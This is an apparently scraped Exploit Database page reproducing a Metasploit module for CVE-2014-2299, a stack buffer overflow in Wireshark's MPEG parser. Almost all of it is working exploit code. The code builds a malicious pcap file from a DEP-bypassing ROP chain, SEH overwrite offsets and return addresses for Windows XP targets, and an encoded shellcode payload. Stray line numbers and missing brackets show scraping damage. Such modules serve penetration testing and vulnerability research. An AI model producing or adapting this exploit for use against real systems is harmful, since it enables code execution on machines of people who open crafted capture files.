Wireshark 1.8.12/1.10.5 – wiretap/mpeg.c Stack Buffer Overflow (Metasploit)

Exploit Database
109 阅读

作者： Metasploit

日期： 2014-04-28
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/33069/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

# Exploit Title: Wireshark 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer

Overflow

# Date: 24/04/2014

# Exploit Author: j0sm1

# Vendor Homepage: www.wireshark.org

# Software Link: http://wireshark.askapache.com/download/win32/all-versions/

# Version: < 1.8.12/1.10.5

# Tested on: Windows XP SP3

# CVE : cve-2014-2299

# Metasploit URL module:

https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/wireshark_mpeg_overflow.rb

# This module requires Metasploit: http//metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GoodRanking

include Msf::Exploit::FILEFORMAT

include Msf::Exploit::Remote::Seh

def initialize(info = {})

super(update_info(info,

'Name' => 'Wireshark <= 1.8.12/1.10.5 wiretap/mpeg.c Stack Buffer Overflow',

'Description'=> %q{

This module triggers a stack buffer overflow in Wireshark <= 1.8.12/1.10.5

by generating an malicious file.)

'License'=> MSF_LICENSE,

'Author' =>

[

'Wesley Neelen', # Discovery vulnerability

'j0sm1',# Exploit and msf module

'References' =>

[

[ 'CVE', '2014-2299'],

[ 'URL', 'https://bugs.wireshark.org/bugzilla/show_bug.cgi?id=9843' ],

[ 'URL', 'http://www.wireshark.org/security/wnpa-sec-2014-04.html' ],

[ 'URL', 'https://www.securityfocus.com/bid/66066/info' ]

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'Payload'=>

{

'BadChars'=> "\xff",

'Space' => 600,

'DisableNops' => 'True',

'PrependEncoder' => "\x81\xec\xc8\x00\x00\x00" # sub esp,200

'Platform' => 'win',

'Targets'=>

[

[ 'WinXP SP3 Spanish (bypass DEP)',

{

'OffSet' => 69732,

'OffSet2' => 70476,

'Ret'=> 0x1c077cc3, # pop/pop/ret -> "c:\Program Files\Wireshark\krb5_32.dll" (version: 1.6.3.16)

'jmpesp' => 0x68e2bfb9,

}

[ 'WinXP SP2/SP3 English(bypass DEP)',

{

'OffSet2' => 70692,

'OffSet' => 70476,

'Ret'=> 0x1c077cc3, # pop/pop/ret -> krb5_32.dll module

'jmpesp' => 0x68e2bfb9,

}

'Privileged' => false,

'DisclosureDate' => 'Mar 20 2014'

))

register_options(

[

OptString.new('FILENAME', [ true, 'pcap file','mpeg_overflow.pcap']),

], self.class)

end

def create_rop_chain()

# rop chain generated with mona.py - www.corelan.be

rop_gadgets =

[

0x61863c2a,# POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]

0x62d9027c,# ptr to &VirtualProtect() [IAT libcares-2.dll]

0x61970969,# MOV EAX,DWORD PTR DS:[EAX] # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]

0x61988cf6,# XCHG EAX,ESI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]

0x619c0a2a,# POP EBP # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]

0x61841e98,# & push esp # ret[libgtk-win32-2.0-0.dll, ver: 2.24.14.0]

0x6191d11a,# POP EBX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]

0x00000201,# 0x00000201-> ebx

0x5a4c1414,# POP EDX # RETN [zlib1.dll, ver: 1.2.5.0]

0x00000040,# 0x00000040-> edx

0x6197660f,# POP ECX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]

0x668242b9,# &Writable location [libgnutls-26.dll]

0x6199b8a5,# POP EDI # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0

0x63a528c2,# RETN (ROP NOP) [libgobject-2.0-0.dll]

0x61863c2a,# POP EAX # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]

0x90909090,# nop

0x6199652d,# PUSHAD # RETN [libgtk-win32-2.0-0.dll, ver: 2.24.14.0]

].flatten.pack("V*")

return rop_gadgets

end

def exploit

print_status("Creating '#{datastore['FILENAME']}' file ...")

ropchain = create_rop_chain

magic_header = "\xff\xfb\x41"# mpeg magic_number(MP3) -> http://en.wikipedia.org/wiki/MP3#File_structure

# Here we build the packet data

packet = rand_text_alpha(883)

packet << "\x6c\x7d\x37\x6c" # NOP RETN

packet << ropchain

packet << payload.encoded# Shellcode

packet << rand_text_alpha(target['OffSet'] - 892 - ropchain.length - payload.encoded.length)

# 0xff is a badchar for this exploit then we can't make a jump back with jmp $-2000

# After nseh and seh we haven't space, then we have to jump to another location.

# When file is open with command line. This is NSEH/SEH overwrite

packet << make_nops(4) # nseh

packet << "\x6c\x2e\xe0\x68" # ADD ESP,93C # MOV EAX,EBX # POP EBX # POP ESI # POP EDI # POP EBP # RETN

packet << rand_text_alpha(target['OffSet2'] - target['OffSet'] - 8) # junk

# When file is open with GUI interface. This is NSEH/SEH overwrite

packet << make_nops(4) # nseh

# seh -> # ADD ESP,86C # POP EBX # POP ESI # POP EDI # POP EBP # RETN** [libjpeg-8.dll] **

packet << "\x55\x59\x80\x6b"

print_status("Preparing payload")

filecontent = magic_header

filecontent << packet

print_status("Writing payload to file, " + filecontent.length.to_s()+" bytes")

file_create(filecontent)

end